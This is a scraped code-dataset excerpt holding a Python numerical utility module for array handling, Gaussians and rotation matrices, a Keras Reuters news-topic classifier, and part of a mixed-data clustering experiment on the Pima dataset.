Nice and fast.\n Written by Willi Richert\n Taken from:\n http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/498246\n on 2006/11/11\n \"\"\"\n coords = np.asarray(coords)\n n, m = coords.shape\n delta = np.zeros((n, n), dtype=np.float64)\n for d in xrange(m):\n data = coords[:, d]\n delta += (data - data[:, np.newaxis]) ** 2\n return np.sqrt(delta)\n\ndef revcmp(x, y):\n \"\"\"Does the reverse of cmp():\n Return negative if yx\"\"\"\n return cmp(y, x)\n\n\nclass Gaussian(object):\n \"\"\"Gaussian function, works with ndarray inputs\"\"\"\n def __init__(self, mu, sigma):\n self.mu = mu\n self.sigma = sigma\n\n def __call__(self, x):\n \"\"\"Called when self is called as a f'n.\n Don't bother normalizing by 1/(sigma*np.sqrt(2*pi)),\n don't care about normalizing the integral,\n just want to make sure that f(0) == 1\"\"\"\n return np.exp( -(x-self.mu)**2 / (2*self.sigma**2) )\n\n def __getitem__(self, x):\n \"\"\"Called when self is indexed into\"\"\"\n return self(x)\n\n\ndef g(x0, sx, x):\n \"\"\"1-D Gaussian\"\"\"\n return np.exp( -(x-x0)**2 / (2*sx**2) )\n\ndef g2(x0, y0, sx, sy, x, y):\n \"\"\"2-D Gaussian\"\"\"\n arg = -(x-x0)**2 / (2*sx**2) - (y-y0)**2 / (2*sy**2)\n return np.exp(arg)\n\ndef g3(x0, y0, z0, sx, sy, sz, x, y, z):\n \"\"\"3-D Gaussian\"\"\"\n return np.exp( -(x-x0)**2 / (2*sx**2) - (y-y0)**2 / (2*sy**2) - (z-z0)**2 / (2*sz**2) )\n\ndef cauchy(x0, gx, x):\n \"\"\"1-D Cauchy. See http://en.wikipedia.org/wiki/Cauchy_distribution\"\"\"\n #return INVPI * gx/((x-x0)**2+gx**2)\n gx2 = gx * gx\n return gx2 / ((x-x0)**2 + gx2)\n\ndef cauchy2(x0, y0, gx, gy, x, y):\n \"\"\"2-D Cauchy\"\"\"\n #return INVPI * gx/((x-x0)**2+gx**2) * gy/((y-y0)**2+gy**2)\n return (gx*gy)**2 / ((x-x0)**2 + gx**2) / ((y-y0)**2 + gy**2)\n\ndef Vf(Im, x0, y0, z0, sx, sy, sz, x, y, z):\n \"\"\"1/r voltage decay function in 2D space\n What to do with the singularity so that the leastsq gets a smooth differentiable f'n?\"\"\"\n #if np.any(x == x0) and np.any(y == y0) and np.any(z == z0):\n # raise ValueError, 'V undefined at singularity'\n return Im / (4*pi) / np.sqrt( sx**2 * (x-x0)**2 + sy**2 * (y-y0)**2 + sz**2 * (z-z0)**2)\n\ndef dgdmu(mu, sigma, x):\n \"\"\"Partial of g wrt mu\"\"\"\n return (x - mu) / sigma**2 * g(mu, sigma, x)\n\ndef dgdsigma(mu, sigma, x):\n \"\"\"Partial of g wrt sigma\"\"\"\n return (x**2 - 2*x*mu + mu**2) / sigma**3 * g(mu, sigma, x)\n\ndef dg2dx0(x0, y0, sx, sy, x, y):\n \"\"\"Partial of g2 wrt x0\"\"\"\n return g(y0, sy, y) * dgdmu(x0, sx, x)\n\ndef dg2dy0(x0, y0, sx, sy, x, y):\n \"\"\"Partial of g2 wrt y0\"\"\"\n return g(x0, sx, x) * dgdmu(y0, sy, y)\n\ndef dg2dsx(x0, y0, sx, sy, x, y):\n \"\"\"Partial of g2 wrt sx\"\"\"\n return g(y0, sy, y) * dgdsigma(x0, sx, x)\n\ndef dg2dsy(x0, y0, sx, sy, x, y):\n \"\"\"Partial of g2 wrt sy\"\"\"\n return g(x0, sx, x) * dgdsigma(y0, sy, y)\n\ndef RM(theta):\n \"\"\"Return 2D (2x2) rotation matrix, with theta counterclockwise rotation in radians\"\"\"\n return np.array([[np.cos(theta), -np.sin(theta)], [np.sin(theta), np.cos(theta)]])\n\n\nclass Poo(object):\n \"\"\"Poo function, works with ndarray inputs\"\"\"\n def __init__(self, a, b, c):\n self.a = a\n self.b = b\n self.c = c\n\n def __call__(self, x):\n \"\"\"Called when self is called as a f'n\"\"\"\n return (1+self.a*x) / (self.b+self.c*x**2)\n\n def __getitem__(self, x):\n \"\"\"Called when self is indexed into\"\"\"\n return self(x)\n\n\ndef hamming(t, N):\n \"\"\"Return y values of Hamming window at sample points t\"\"\"\n #if N == None:\n # N = (len(t) - 1) / 2\n return 
0.54 - 0.46 * np.cos(pi * (2*t + N)/N)\n\ndef hex2rgb(hexcolours):\n \"\"\"Convert colours RGB hex string list into an RGB int array\"\"\"\n hexcolours = toiter(hexcolours)\n rgb = []\n for s in hexcolours:\n s = s[len(s)-6:len(s)] # get last 6 characters\n r, g, b = s[0:2], s[2:4], s[4:6]\n r, g, b = int(r, base=16), int(g, base=16), int(b, base=16)\n rgb.append((r, g, b))\n return np.uint8(rgb)\n\ndef hex2rgba(hexcolours, alpha=255):\n \"\"\"Convert colours RGB hex string list into an RGBA int array\"\"\"\n assert type(alpha) == int and 0 <= alpha <= 255\n rgb = hex2rgb(hexcolours)\n alphas = np.repeat(alpha, len(rgb))\n alphas.shape = -1, 1 # make it 2D column vector\n return np.concatenate([rgb, alphas], axis=1)\n\ndef hex2floatrgba(hexcolours, alpha=255):\n \"\"\"Convert colours RGB hex string list into an RGBA float array\"\"\"\n assert type(alpha) == int and 0 <= alpha <= 255\n rgba = hex2rgba(hexcolours, alpha)\n return np.float64(rgba) / 255.\n\ndef rgb2hex(rgbcolours):\n \"\"\"Convert RGB int array into a hex string list\"\"\"\n rgbcolours = toiter(rgbcolours)\n hx = []\n for rgb in rgbcolours:\n r, g, b = rgb\n h = hex(r*2**16 + g*2**8 + b)\n h = lrstrip(h, '0x', 'L')\n pad = (6 - len(h)) * '0'\n h = '#' + pad + h\n hx.append(h)\n return hx\n\nc = np.cos\ns = np.sin\n\ndef Rx(t):\n \"\"\"Rotation matrix around x axis, theta in radians\"\"\"\n return np.matrix([[1, 0, 0 ],\n [0, c(t), -s(t)],\n [0, s(t), c(t)]])\n\ndef Ry(t):\n \"\"\"Rotation matrix around y axis, theta in radians\"\"\"\n return np.matrix([[ c(t), 0, s(t)],\n [ 0, 1, 0 ],\n [-s(t), 0, c(t)]])\n\ndef Rz(t):\n \"\"\"Rotation matrix around z axis, theta in radians\"\"\"\n return np.matrix([[c(t), -s(t), 0],\n [s(t), c(t), 0],\n [0, 0, 1]])\n\ndef R(tx, ty, tz):\n \"\"\"Return full 3D rotation matrix, given thetas in degress.\n Mayavi (tvtk actually) rotates axes in Z, X, Y order, for\n some unknown reason. So, we have to do the same. See:\n tvtk_classes.zip/actor.py:32\n tvtk_classes.zip/prop3d.py:67\n \"\"\"\n # convert to radians, then take matrix product\n return Rz(tz*pi/180)*Rx(tx*pi/180)*Ry(ty*pi/180)\n'''\ndef normdeg(angle):\n return angle % 360\n\ndef win2posixpath(path):\n path = path.replace('\\\\', '/')\n path = os.path.splitdrive(path)[-1] # remove drive name from start\n return path\n\ndef oneD2D(a):\n \"\"\"Convert 1D array to 2D array. Can do this just as easily using a[None, :]\"\"\"\n a = a.squeeze()\n assert a.ndim == 1, \"array has more than one non-singleton dimension\"\n a.shape = 1, len(a) # make it 2D\n return a\n\ndef twoD1D(a):\n \"\"\"Convert trivially 2D array to 1D array. Seems unnecessary. 
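# Sanity check for the rotation helpers above: R(tx, ty, tz) composes
# Rz * Rx * Ry (tvtk's Z, X, Y application order), with angles in degrees
# converted to radians inside. A single-axis spot check:
import numpy as np

theta = np.pi / 2
Rz90 = np.array([[np.cos(theta), -np.sin(theta), 0],
                 [np.sin(theta),  np.cos(theta), 0],
                 [0,              0,             1]])
# rotating the x unit vector 90 degrees about z yields the y unit vector:
assert np.allclose(Rz90.dot([1.0, 0.0, 0.0]), [0.0, 1.0, 0.0])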
Just call squeeze()\"\"\"\n a = a.squeeze()\n assert a.ndim == 1, \"array has more than one non-singleton dimension\"\n return a\n'''\ndef is_unique(a):\n \"\"\"Check whether a has purely unique values in it\"\"\"\n u = np.unique(a)\n if len(a) != len(u):\n return False\n else:\n return True\n\ndef intersect1d(arrays, assume_unique=False):\n \"\"\"Find the intersection of any number of 1D arrays.\n Return the sorted, unique values that are in all of the input arrays.\n Adapted from numpy.lib.arraysetops.intersect1d\"\"\"\n N = len(arrays)\n if N == 0:\n return np.asarray(arrays)\n arrays = list(arrays) # allow assignment\n if not assume_unique:\n for i, arr in enumerate(arrays):\n arrays[i] = np.unique(arr)\n aux = np.concatenate(arrays) # one long 1D array\n aux.sort() # sorted\n if N == 1:\n return aux\n shift = N-1\n return aux[aux[shift:] == aux[:-shift]]\n\ndef rowtake(a, i):\n \"\"\"For each row in a, return values according to column indices in the\n corresponding row in i. Returned shape == i.shape\"\"\"\n assert a.ndim == 2\n assert i.ndim <= 2\n '''\n if i.ndim == 1:\n j = np.arange(a.shape[0])\n else: # i.ndim == 2\n j = np.repeat(np.arange(a.shape[0]), i.shape[1])\n j.shape = i.shape\n j *= a.shape[1]\n j += i\n return a.flat[j]\n '''\n # this is about 3X faster:\n if i.ndim == 1:\n return a[np.arange(a.shape[0]), i]\n else: # i.ndim == 2\n return a[np.arange(a.shape[0])[:, None], i]\n\ndef td2usec(td):\n \"\"\"Convert datetime.timedelta to microseconds\"\"\"\n sec = td.total_seconds() # float\n usec = intround(sec * 1000000) # round to nearest us\n return usec\n\ndef td2days(td):\n \"\"\"Convert datetime.timedelta to days\"\"\"\n sec = td.total_seconds() # float\n days = sec / 3600 / 24\n return days\n\ndef issorted(x):\n \"\"\"Check if x is sorted\"\"\"\n try:\n if x.dtype.kind == 'u':\n # x is unsigned int array, risk of int underflow in np.diff\n x = np.int64(x)\n except AttributeError:\n pass # no dtype, not an array\n return (np.diff(x) >= 0).all() # is difference between consecutive entries >= 0?\n # or, you could compare the array to an explicitly sorted version of itself,\n # and see if they're identical\n\ndef concatenate_destroy(arrs):\n \"\"\"Concatenate list of arrays along 0th axis, destroying them in the process.\n Doesn't duplicate everything in arrays, as does numpy.concatenate. Only\n temporarily duplicates one array at a time, saving memory\"\"\"\n if type(arrs) != list:\n raise TypeError('arrays must be in a list')\n #arrs = list(arrs) # don't do this! this prevents destruction of the original arrs\n nrows = 0\n subshape = arrs[0].shape[1::] # dims excluding concatenation dim\n dtype = arrs[0].dtype\n # ensure all arrays in arrs are compatible:\n for i, a in enumerate(arrs):\n nrows += len(a)\n if a.shape[1::] != subshape:\n raise TypeError(\"array %d has subshape %r instead of %r\" %\n (i, a.shape[1::], subshape))\n if a.dtype != dtype:\n raise TypeError(\"array %d has dtype %r instead of %r\" % (i, a.dtype, dtype))\n subshape = list(subshape)\n shape = [nrows] + subshape\n\n # unlike np.zeros, it seems np.empty doesn't allocate real memory, but does temporarily\n # allocate virtual memory, which is then converted to real memory as 'a' is filled:\n try:\n a = np.empty(shape, dtype=dtype) # empty only allocates virtual memory\n except MemoryError:\n raise MemoryError(\"concatenate_destroy: not enough virtual memory to allocate \"\n \"destination array. 
Create/grow swap file?\")\n \n rowi = 0\n for i in range(len(arrs)):\n arr = arrs.pop(0)\n nrows = len(arr)\n a[rowi:rowi+nrows] = arr # concatenate along 0th axis\n rowi += nrows\n return a\n\ndef lst2shrtstr(lst, sigfigs=4, brackets=False):\n \"\"\"Return string representation of list, replacing any floats with potentially\n shorter representations with fewer sig figs. Any string items in list will be\n simplified by having their quotes removed\"\"\"\n gnumfrmt = string.join(['%.', str(sigfigs), 'g'], sep='')\n strlst = []\n for val in lst:\n try:\n strlst.append(gnumfrmt % val)\n except TypeError:\n strlst.append(val) # val isn't a general number\n s = string.join(strlst, sep=', ')\n if brackets:\n s = string.join(['[', s, ']'], sep='')\n return s\n\ndef rms(a, axis=None):\n \"\"\"Return root-mean-squared value of array a along axis\"\"\"\n return np.sqrt(np.mean(a**2, axis))\n\ndef rmserror(a, b, axis=None):\n \"\"\"Return root-mean-squared error between arrays a and b\"\"\"\n return rms(a - b, axis=axis)\n\ndef lstrip(s, strip):\n \"\"\"What I think str.lstrip should really do\"\"\"\n if s.startswith(strip):\n return s[len(strip):] # strip it\n else:\n return s\n\ndef rstrip(s, strip):\n \"\"\"What I think str.rstrip should really do\"\"\"\n if s.endswith(strip):\n return s[:-len(strip)] # strip it\n else:\n return s\n\ndef strip(s, strip):\n \"\"\"What I think str.strip should really do\"\"\"\n return rstrip(lstrip(s, strip), strip)\n\ndef lrstrip(s, lstr, rstr):\n \"\"\"Strip lstr from start of s and rstr from end of s\"\"\"\n return rstrip(lstrip(s, lstr), rstr)\n\ndef pad(x, align=8):\n \"\"\"Pad x with null bytes so it's a multiple of align bytes long\"\"\"\n if type(x) == str: # or maybe unicode?\n return padstr(x, align=align)\n elif type(x) == np.ndarray:\n return padarr(x, align=align)\n else:\n raise TypeError('Unhandled type %r in pad()')\n\ndef padstr(x, align=8):\n \"\"\"Pad string x with null bytes so it's a multiple of align bytes long\"\"\"\n nbytes = len(x)\n rem = nbytes % align\n npadbytes = align - rem if rem else 0 # nbytes to pad with for 8 byte alignment\n if npadbytes == 0:\n return x\n x = x.encode('ascii') # ensure it's pure ASCII, where each char is 1 byte\n x += '\\0' * npadbytes # returns a copy, doesn't modify in place\n assert len(x) % align == 0\n return x\n\ndef padarr(x, align=8):\n \"\"\"Flatten array x and pad with null bytes so it's a multiple of align bytes long\"\"\"\n nitems = len(x.ravel())\n nbytes = x.nbytes\n dtypenbytes = x.dtype.itemsize\n rem = nbytes % align\n npadbytes = align - rem if rem else 0 # nbytes to pad with for 8 byte alignment\n if npadbytes == 0:\n return x\n if npadbytes % dtypenbytes != 0:\n raise RuntimeError(\"Can't pad %d byte array to %d byte alignment\" %\n (dtypenbytes, align))\n npaditems = npadbytes / dtypenbytes\n x = x.ravel().copy() # don't modify in place\n # pads with npaditems zeros, each of length dtypenbytes:\n x.resize(nitems + npaditems, refcheck=False)\n assert x.nbytes % align == 0\n return x\n\ndef shiftpad(a, n):\n \"\"\"Horizontally shift 2D array a *in-place* by n points. -ve n shifts\n left, +ve shifts right. Pad with edge values at the appropriate end.\n This is probably the same as np.roll(), except edge values are padded\n instead of wrapped. 
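# Usage sketch for the string-stripping helpers above (pure functions, so
# they can be exercised directly):
assert lstrip('track5_data', 'track5_') == 'data'
assert rstrip('recording.srf', '.srf') == 'recording'
assert lrstrip('../recording.srf', '../', '.srf') == 'recording'
assert lstrip('data', 'nope') == 'data'   # unchanged when prefix absent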
Also, I think np.roll returns a copy\"\"\"\n assert a.ndim == 2\n assert type(n) == int\n assert n != 0\n if n > 0: # shift right, pad with left edge\n ledge = a[:, 0, None] # keep it 2D (nrows x 1)\n a[:, n:] = a[:, :-n] # throw away right edge\n a[:, 1:n] = ledge # pad with left edge\n else: # n < 0, shift left, pad with right edge\n redge = a[:, -1, None] # keep it 2D (nrows x 1)\n a[:, :n] = a[:, -n:] # throw away left edge\n a[:, n:-1] = redge # pad with right edge\n # no need to return anything\n\ndef rollwin(a, width):\n \"\"\"Return a.nd + 1 dimensional array, where the last dimension contains\n consecutively shifted windows of a of the given width, each shifted by 1\n along the last dimension of a. This allows for calculating rolling stats,\n as well as searching for the existence and position of subarrays in a\n larger array, all without having to resort to Python loops or making\n copies of a.\n\n Taken from:\n http://www.rigtorp.se/2011/01/01/rolling-statistics-numpy.html\n http://stackoverflow.com/questions/7100242/python-numpy-first-occurrence-of-subarray\n http://stackoverflow.com/questions/6811183/rolling-window-for-1d-arrays-in-numpy\n\n Ex 1:\n >>> x = np.arange(10).reshape((2,5))\n >>> rollwin(x, 3)\n array([[[0, 1, 2], [1, 2, 3], [2, 3, 4]],\n [[5, 6, 7], [6, 7, 8], [7, 8, 9]]]) \n >>> np.mean(rollwin(x, 3), -1)\n array([[ 1., 2., 3.],\n [ 6., 7., 8.]])\n\n Ex 2:\n >>> a = np.arange(10)\n >>> np.random.shuffle(a)\n >>> a\n array([7, 3, 6, 8, 4, 0, 9, 2, 1, 5])\n >>> rollwin(a, 3) == [8, 4, 0]\n array([[False, False, False],\n [False, False, False],\n [False, False, False],\n [ True, True, True],\n [False, False, False],\n [False, False, False],\n [False, False, False],\n [False, False, False]], dtype=bool)\n >>> np.all(rollwin(a, 3) == [8, 4, 0], axis=1)\n array([False, False, False, True, False, False, False, False], dtype=bool)\n >>> np.where(np.all(rollwin(a, 3) == [8, 4, 0], axis=1))[0][0]\n 3\n \"\"\"\n shape = a.shape[:-1] + (a.shape[-1] - width + 1, width)\n strides = a.strides + (a.strides[-1],)\n return np.lib.stride_tricks.as_strided(a, shape=shape, strides=strides)\n\ndef rollwin2D(a, width):\n \"\"\"A modified version of rollwin. Allows for easy columnar search of 2D\n subarray b within larger 2D array a, assuming both have the same number of\n rows.\n \n Ex:\n >>> a\n array([[44, 89, 34, 67, 11, 92, 22, 72, 10, 81],\n [52, 40, 29, 35, 67, 10, 24, 23, 65, 51],\n [70, 58, 14, 34, 11, 66, 47, 68, 11, 56],\n [70, 55, 47, 30, 39, 79, 71, 70, 67, 33]]) \n >>> b\n array([[67, 11, 92],\n [35, 67, 10],\n [34, 11, 66],\n [30, 39, 79]])\n >>> np.where((rollwin2D(a, 3) == b).all(axis=1).all(axis=1))[0]\n array([3])\n \"\"\"\n assert a.ndim == 2\n shape = (a.shape[1] - width + 1, a.shape[0], width)\n strides = (a.strides[-1],) + a.strides\n return np.lib.stride_tricks.as_strided(a, shape=shape, strides=strides)\n\ndef argcolsubarr2D(a, b):\n \"\"\"Return column index of smaller subarray b within bigger array a. Both\n must be 2D and have the same number of rows. 
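# Standalone illustration of the stride trick behind rollwin(): the extra
# window axis reuses the last stride, so the view costs no copies.
import numpy as np

a = np.arange(6)                           # [0 1 2 3 4 5]
width = 3
shape = a.shape[:-1] + (a.shape[-1] - width + 1, width)
strides = a.strides + (a.strides[-1],)
w = np.lib.stride_tricks.as_strided(a, shape=shape, strides=strides)
assert np.allclose(w.mean(axis=-1), [1.0, 2.0, 3.0, 4.0])   # rolling mean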
Raises IndexError if b is not\n a subarray of a\"\"\"\n assert a.ndim == b.ndim == 2\n assert a.shape[0] == b.shape[0] # same nrows\n width = b.shape[1] # ncols in b\n return np.where((rollwin2D(a, width) == b).all(axis=1).all(axis=1))[0]\n\ndef lrrep2Darrstripis(a):\n \"\"\"Return left and right slice indices that strip repeated values from all rows\n from left and right ends of 2D array a, such that a[:, lefti:righti] gives you\n the stripped version.\n\n Ex:\n >>> a\n array([[44, 44, 44, 44, 89, 34, 67, 11, 92, 22, 72, 10, 81, 81, 81],\n [52, 52, 52, 52, 40, 29, 35, 67, 10, 24, 23, 65, 51, 51, 51],\n [70, 70, 70, 70, 58, 14, 34, 11, 66, 47, 68, 11, 56, 56, 56],\n [70, 70, 70, 70, 55, 47, 30, 39, 79, 71, 70, 67, 33, 33, 33]])\n >>> lrrep2Darrstripis(a)\n (3, -2)\n \"\"\"\n assert a.ndim == 2\n left = a[:, :1] # 2D column vector\n right = a[:, -1:] # 2D column vector\n leftcolis = argcolsubarr2D(a, left)\n lefti = 0 # at least 1 hit, at the far left edge\n if len(leftcolis) > 1: # multiple hits, get slice index of rightmost consecutive hit\n consecis = np.where(np.diff(leftcolis) == 1)[0]\n if len(consecis) > 0:\n lefti = max(consecis) + 1\n rightcolis = argcolsubarr2D(a, right)\n righti = a.shape[1] # at least 1 hit, at the far right edge\n if len(rightcolis) > 1: # multiple hits, get slice index of leftmost consecutive hit\n consecis = np.where(np.diff(rightcolis)[::-1] == 1)[0]\n if len(consecis) > 0:\n righti = -(max(consecis) + 1)\n return lefti, righti\n\ndef normpdf(p, lapcorrect=1e-10):\n \"\"\"Ensure p is normalized (sums to 1). Return p unchanged if it's already normalized.\n Otherwise, return it normalized. I guess this treats p as a pmf, not strictly a pdf.\n Optional apply Laplacian correction to avoid 0s\"\"\"\n p = np.float64(p) # copy and ensure it's float before modifying in-place\n if lapcorrect and (p == 0).any():\n p += lapcorrect\n psum = p.sum()\n if not np.allclose(psum, 1.0) and psum > 0: # make sure the probs sum to 1\n #print(\"p sums to %f instead of 1, normalizing\" % psum)\n p /= psum\n return p\n\ndef DKL(p, q):\n \"\"\"Kullback-Leibler divergence from true probability distribution p to arbitrary\n distribution q\"\"\"\n assert len(p) == len(q)\n p, q = normpdf(np.asarray(p)), normpdf(np.asarray(q))\n return sum(p * np.log2(p/q))\n \ndef DJS(p, q):\n \"\"\"Jensen-Shannon divergence, a symmetric measure of divergence between\n distributions p and q\"\"\"\n assert len(p) == len(q)\n p, q = normpdf(np.asarray(p)), normpdf(np.asarray(q))\n m = (p + q) / 2\n return (DKL(p, m) + DKL(q, m)) / 2\n\ndef updatenpyfilerows(fname, rows, arr):\n \"\"\"Given a numpy formatted binary file (usually with .npy extension,\n but not necessarily), update 0-based rows (first dimension) of the\n array stored in the file from arr. 
Works for arrays of any rank >= 1\"\"\"\n assert len(arr) >= 1 # has at least 1 row\n f = open(fname, 'r+b') # open in read+write binary mode\n # get .npy format version:\n major, minor = np.lib.format.read_magic(f)\n assert (major == 1 and minor == 0)\n # read header to move file pointer to start of array in file\n shape, fortran_order, dtype = np.lib.format.read_array_header_1_0(f)\n assert shape == arr.shape\n assert fortran_order == np.isfortran(arr)\n assert dtype == arr.dtype\n arroffset = f.tell()\n rowsize = arr[0].size * dtype.itemsize # nbytes per row\n # sort rows so that we move efficiently from start to end of file\n rows = sorted(rows) # rows might be a set, list, tuple, or array, convert to list\n # update rows in file\n for row in rows:\n f.seek(arroffset + row*rowsize) # seek from start of file, row is 0-based\n f.write(arr[row])\n f.close()\n","sub_path":"spyke/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":90864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"159229416","text":"from keras import models, layers, optimizers, losses, metrics\nfrom keras.datasets import reuters\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef vectorize_sequences(sequences, dimension=10000):\n results = np.zeros((len(sequences), dimension))\n\n # set all apearant words to 1\n for i, sequence in enumerate(sequences):\n results[i,sequence] = 1.\n \n return results\n\ndef to_one_hot(labels, dimension=46):\n results = np.zeros((len(labels), dimension))\n\n for i,label in enumerate(labels):\n results[i,label]=1.\n\n return results\n\n\n# load datasets\n(train_data, train_labels),(test_data, test_labels) = reuters.load_data(num_words=10000)\n\n# preprocess data\nx_train = vectorize_sequences(train_data)\nx_test = vectorize_sequences(test_data)\n\ny_train = to_one_hot(train_labels)\ny_test = to_one_hot(test_labels)\n\n# leave some data for validation\nx_val = x_train[:1000] # validation set\npartial_x_train = x_train[1000:] # train set\n\ny_val = y_train[:1000] # validation set\npartial_y_train = y_train[1000:] # train set\n\n# construct dl model\nmodel = models.Sequential()\nmodel.add(layers.Dense(64, activation='relu', input_shape=(10000, )))\nmodel.add(layers.Dense(64, activation='relu'))\nmodel.add(layers.Dense(64, activation='relu'))\nmodel.add(layers.Dense(46, activation='sigmoid'))\n\nmodel.compile( optimizer='RMSprop', \n loss='categorical_crossentropy',\n metrics=['accuracy'])\n \n\n# train model\nhistory = model.fit(partial_x_train,\n partial_y_train,\n epochs=9,\n batch_size=512,\n validation_data=(x_val,y_val))\n\n# plot train loss \nhistory_dict = history.history\nloss_values = history_dict['loss']\nval_loss_values = history_dict['val_loss']\n\nepochs = range(1,len(loss_values) + 1)\n\nplt.plot(epochs, loss_values, 'bo', label='Training loss')\nplt.plot(epochs, val_loss_values, 'b', label='Validation loss')\nplt.title('Training and validation loss')\nplt.xlabel('Epochs')\nplt.ylabel('Loss')\nplt.legend()\n\nplt.show()\n\n# test\n# mode.predict(x_test)\nresults = model.evaluate(x_test, y_test)\nprint(results)","sub_path":"tensorflow/deep_learning_with_python/03_05_reuters.py","file_name":"03_05_reuters.py","file_ext":"py","file_size_in_byte":2175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"459298730","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Jun 8 13:25:11 2020\r\n\r\n@author: rfuchs\r\n\"\"\"\r\n\r\nimport os 
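# Note on the Reuters (keras) example above: with 46 mutually exclusive topics
# and a categorical_crossentropy loss, the output layer is conventionally
# softmax rather than sigmoid, so predicted class probabilities sum to 1:
#
#     model.add(layers.Dense(46, activation='softmax'))
#
# Also, keras.utils.to_categorical(labels, 46) is the built-in equivalent of
# the hand-rolled to_one_hot() helper there.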
\r\n\r\nos.chdir('C:/Users/rfuchs/Documents/GitHub/MDGMM_suite/M1DGMM')\r\n\r\nfrom copy import deepcopy\r\n\r\nfrom sklearn.metrics import precision_score\r\nfrom sklearn.metrics import confusion_matrix\r\nfrom sklearn.preprocessing import LabelEncoder \r\nfrom sklearn.preprocessing import OneHotEncoder\r\n\r\nfrom gower import gower_matrix\r\nfrom sklearn.metrics import silhouette_score\r\n\r\n\r\nimport pandas as pd\r\n\r\nfrom m1dgmm import M1DGMM\r\nfrom init_params import dim_reduce_init\r\nfrom metrics import misc, cluster_purity\r\nfrom data_preprocessing import gen_categ_as_bin_dataset, \\\r\n compute_nj\r\n\r\nimport autograd.numpy as np\r\n\r\n\r\n###############################################################################\r\n######################## Pima data vizualisation #########################\r\n###############################################################################\r\n\r\n#===========================================#\r\n# Importing data\r\n#===========================================#\r\nos.chdir('C:/Users/rfuchs/Documents/These/Stats/mixed_dgmm/datasets')\r\n\r\npima = pd.read_csv('pima/pima_indians.csv', sep = ',')\r\ny = pima.iloc[:,:-1]\r\nlabels = pima.iloc[:,-1]\r\n\r\ny = y.infer_objects()\r\nnumobs = len(y)\r\n\r\n\r\nn_clusters = len(np.unique(labels))\r\np = y.shape[1]\r\n\r\n#===========================================#\r\n# Formating the data\r\n#===========================================#\r\nvar_distrib = np.array(['ordinal', 'continuous', 'continuous', 'continuous',\\\r\n 'continuous', 'continuous', 'continuous', 'continuous']) \r\n \r\n# Ordinal data already encoded\r\n \r\ny_categ_non_enc = deepcopy(y)\r\nvd_categ_non_enc = deepcopy(var_distrib)\r\n\r\n# No categ data\r\n# No binary data \r\n\r\nenc = OneHotEncoder(sparse = False, drop = 'first')\r\nlabels_oh = enc.fit_transform(np.array(labels).reshape(-1,1)).flatten()\r\n\r\nnj, nj_bin, nj_ord, n_categ = compute_nj(y, var_distrib)\r\ny_np = y.values\r\nnb_cont = np.sum(var_distrib == 'continuous')\r\n\r\np_new = y.shape[1]\r\n\r\n# Feature category (cf)\r\ncf_non_enc = np.logical_or(vd_categ_non_enc == 'categorical', vd_categ_non_enc == 'bernoulli')\r\n\r\n# Non encoded version of the dataset:\r\ny_nenc_typed = y_categ_non_enc.astype(np.object)\r\ny_np_nenc = y_nenc_typed.values\r\n\r\n# Defining distances over the non encoded features\r\ndm = gower_matrix(y_nenc_typed, cat_features = cf_non_enc) \r\n\r\ndtype = {y.columns[j]: np.float64 if (var_distrib[j] != 'bernoulli') and \\\r\n (var_distrib[j] != 'categorical') else np.str for j in range(p_new)}\r\n\r\ny = y.astype(dtype, copy=True)\r\n\r\n#===========================================#\r\n# Running the algorithm\r\n#===========================================# \r\n\r\nr = np.array([3, 2, 1])\r\nnumobs = len(y)\r\nk = [4, n_clusters]\r\n\r\nseed = 1\r\ninit_seed = 2\r\n \r\neps = 1E-05\r\nit = 20\r\nmaxstep = 100\r\n\r\n\r\nprince_init = dim_reduce_init(y, n_clusters, k, r, nj, var_distrib, seed = None,\\\r\n use_famd=True)\r\nm, pred = misc(labels_oh, prince_init['classes'], True) \r\nprint(m)\r\nprint(confusion_matrix(labels_oh, pred))\r\nprint(silhouette_score(dm, pred, metric = 'precomputed'))\r\n\r\n\r\nout = M1DGMM(y_np, n_clusters, r, k, prince_init, var_distrib, nj, it, eps, \\\r\n maxstep, seed, perform_selec = False)\r\nm, pred = misc(labels_oh, out['classes'], True) \r\nprint(m)\r\nprint(confusion_matrix(labels_oh, pred))\r\nprint(silhouette_score(dm, pred, metric = 'precomputed'))\r\n\r\n# Plot the final groups\r\n\r\nimport 
matplotlib\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\ncolors = ['green','red']\r\n\r\nfig = plt.figure(figsize=(8,8))\r\nplt.scatter(out[\"z\"][:, 0], out[\"z\"][:, 1], c=pred,\\\r\n cmap=matplotlib.colors.ListedColormap(colors))\r\n\r\ncb = plt.colorbar()\r\ncb.ax.get_yaxis().set_ticks([])\r\nfor j, lab in enumerate(['absence','presence']):\r\n cb.ax.text(.5, (2 * j + 1) / 4.0, lab, ha='center', va='center', rotation=90)\r\ncb.ax.get_yaxis().labelpad = 15\r\n\r\n\r\n#=========================================================================\r\n# Performance measure : Finding the best specification for init and DDGMM\r\n#=========================================================================\r\n\r\nres_folder = 'C:/Users/rfuchs/Documents/These/Experiences/mixed_algos/pima'\r\n\r\n\r\n# Init\r\n# Best one r = (2,1)\r\nnumobs = len(y)\r\nk = [n_clusters]\r\n\r\nnb_trials= 30\r\nmca_res = pd.DataFrame(columns = ['it_id', 'r', 'micro', 'macro', 'purity'])\r\n\r\nfor r1 in range(2, 9):\r\n print(r1)\r\n r = np.array([r1, 1])\r\n for i in range(nb_trials):\r\n # Prince init\r\n prince_init = dim_reduce_init(y, n_clusters, k, r, nj, var_distrib, seed = None)\r\n m, pred = misc(labels_oh, prince_init['classes'], True) \r\n cm = confusion_matrix(labels_oh, pred)\r\n purity = cluster_purity(cm)\r\n \r\n micro = precision_score(labels_oh, pred, average = 'micro')\r\n macro = precision_score(labels_oh, pred, average = 'macro')\r\n #print(micro)\r\n #print(macro)\r\n \r\n mca_res = mca_res.append({'it_id': i + 1, 'r': str(r), 'micro': micro, 'macro': macro, \\\r\n 'purity': purity}, ignore_index=True)\r\n \r\n\r\nmca_res.groupby('r').mean()\r\nmca_res.groupby('r').std()\r\n\r\nmca_res.to_csv(res_folder + '/mca_res.csv')\r\n\r\n\r\n# MDGMM. 
